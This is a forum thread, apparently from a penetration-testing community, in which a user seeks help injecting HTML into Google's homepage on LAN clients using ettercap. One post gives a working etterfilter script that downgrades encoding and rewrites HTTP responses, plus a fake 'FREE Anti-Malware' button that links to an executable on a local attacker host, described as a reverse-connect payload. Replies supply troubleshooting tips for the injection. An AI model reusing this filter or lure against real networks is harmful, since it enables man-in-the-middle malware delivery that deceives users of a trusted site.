Results 1 to 5 of 5

Thread: How does Google render

  1. #1
    Junior Member JF1976's Avatar
    Join Date
    Jan 2010
    Location
    Kings Lynn, Norfolk UK
    Posts
    31

    Default How does Google render

    hi all,

    i hope this is the right place to ask this, but i've been working on an attack vector for LAN clients that involves injecting extra html using ettercap into the google main index page but rendering never quite works after the injection i have review the filter and feel that all should be ok apart from when i look closer at googles code the page look to be checked or running scripts that are broken by the filter ?

    so my main question is "what would be the best way to inject html into this page and other".

    thanks.

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by jf1976 View Post
    hi all,

    i hope this is the right place to ask this, but i've been working on an attack vector for LAN clients that involves injecting extra html using ettercap into the google main index page but rendering never quite works after the injection i have review the filter and feel that all should be ok apart from when i look closer at googles code the page look to be checked or running scripts that are broken by the filter ?

    so my main question is "what would be the best way to inject html into this page and other".

    thanks.
    So what does happen in the browser when you do this? Blank screen? Garbled output?

    Are you sure the HTML you are inserting is valid? If you save it to a file and open it in a browser does it render properly then?

    Have you tried doing a single character replacement (with the response staying the same size) to see if that works?
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Junior Member JF1976's Avatar
    Join Date
    Jan 2010
    Location
    Kings Lynn, Norfolk UK
    Posts
    31

    Default

    injection works but i needed to insert a new line into the code as this breaks other lines and drops the code off the page, i've tried placing the code into different parts but no matter what happens i dont get the results im after.

    the inject is a button + text and provides a link to mspayload with a reverse connect, using a standard DATA.data search & replace via ettercap if i save the html from google and run the inject locally the inject works a treat.

    injection :
    <p><h10>Google now has FREE Anti-Malware</h10><form action="http://192.168.1.68/google-scan.exe" method="link"><INPUT TYPE=submit value="Click here"></form></p>
    filter:
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept.Nothing!");
        }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
        if (search(DATA.data, ",pl:[]}};")) {
            replace(",pl:[]}};",",pl:[]}\n }; My-New-Line \n");
            msg(" IN ");
        }}
    the search data
    ,pl:[]}};
    and the replace data
    ,pl:[]}\n }; My-New-Line \n
    is not really a problem it more the understanding of how to reverse the page to confirm or rule out my guess that the code is self checking?

    my first idea was that the 12 lines of code used the max char[255] and was causing the line breaks but, after injection of the new line i still get errors this is about the only thing i've use ettercap for and am assuming that the above is valid.

    i have just rebuilt the filter for testing and changes the search and replace to start at </title>
    and the resulting code for the site is on pastie.org

    http://pastie.org/621565.js'

    if you crtl+end to the last part you will see broken code

    <a href="http://mail.google.com/mail/?hl=en&tab=wm" class=gb1
    so the question is what are the limitations to ettercap?
    ie. must the replacement be the same length....

    does the code self check?

    i just wondered if anyone else had tried lan based injection into TRUSTED site to deploy payloads.

    or if someone can point me in the right direction for page / code analysis when such problems arise.

  4. #4
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default

    Quote Originally Posted by jf1976 View Post
    so the question is what are the limitations to ettercap?
    ie. must the replacement be the same length....
    A lot of the examples I have seen seem to suggest so, and when I last used Ettercap my replacement data was the same size, however post 27 below seems to indicate otherwise - that the replacment can be longer.

    http://forums.remote-exploit.org/bac...-filter-3.html

    When you tried capturing the data that reaches the client in something like Wireshark and seeing if you can do a TCP Stream View on the data? This should give you a quick idea of whether the received packets are invalid in any way after receipt, which may stop them being read correctly by the browser.

    Quote Originally Posted by jf1976 View Post
    does the code self check?
    Do you mean does the code of google.com check itself to see if its valid before loading in a browser? Ive never heard of a page doing this and dont know how it would be possible, unless all of the code to be displayed was generated through Javascript and it ran a crude checksum before displaying it. However I dont believe this is the case for Google because it loads fine with scripts disabled using NoScript.

    Why dont you try this using a page other than Google - maybe something simple you code yourself - just to see if the basic principle works. If it works with another page you will know that there may be something special about Google...
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  5. #5
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by lupin View Post
    that the replacment can be longer.
    Even older versions of ettercap have this capability - one merely needs to calculate the http length in the return header (and fix appropriately).

    It has merely gotten easier though, with later releases of etterfilter permitting things like += and -= to reduce the need for this.

    Definitely worth checking out.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •